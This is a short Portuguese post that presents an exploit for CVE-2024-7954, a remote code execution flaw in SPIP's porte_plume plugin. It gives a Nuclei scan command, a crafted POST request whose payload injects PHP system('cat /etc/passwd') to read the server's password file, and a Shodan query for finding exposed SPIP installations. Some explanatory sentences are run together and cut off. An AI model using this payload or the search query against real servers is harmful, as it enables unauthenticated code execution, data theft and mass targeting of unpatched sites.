
Exploit para CVE-2024-7954, um RCE crítico no plugin porte_plume do SPIP, com uma solicitação HTTP elaborada e template Nuclei para varredura automatizada.
O plugin porte_plume, utilizado por versões do SPIP anteriores a 4.30-alpha2, 4.2.13 e 4.1.16, é suscetível a uma vulnerabilidade crítica de execução arbitrária de código (RCE). Esta falha permite que um atacante remoto não autenticado execute código PHP arbitrário como o usuário do SPIP ao elaborar uma requisição HTTP específica. O potencial de exploração é severo, permitindo que atacantes executem comandos maliciosos no servidor, o que pode levar a acesso não autorizado, violações de dados ou comprometimento adicional do sistema.
kali@Dell:~/nuclei-templates-main/http/cves/2024$ nuclei -l targets -t /home/kali/nuclei-templates-main/http/cves/2024/CVE-2024-7954.yaml
Um exemplo de uma requisição HTTP manipulada que pode ser usada para explorar esta vulnerabilidade é:
POST /index.php?action=porte_plume_previsu HTTP/1.1
Host: {{Hostname}} -> IP
Content-Type: application/x-www-form-urlencoded
data=AA_[->URL<?php system('cat /etc/passwd'); ?>]_BB
POST é direcionada para a ação porte_plume_previsu do arquivo index.php do SPIP.system() do PHP para executar um comando (neste caso, cat /etc/passwd), que lê o conteúdo do arquivo de senhas.system(), um atacante poderia executar qualquer código PHP no servidor, levando a consequências graves.Para identificar instalações SPIP potencialmente vulneráveis, a seguinte consulta de busca no Shodan pode ser usada:
app="SPIP"
Esta vulnerabilidade ressalta a importância de manter o software atualizado e implementar medidas de segurança robustas para se proteger contra exploração.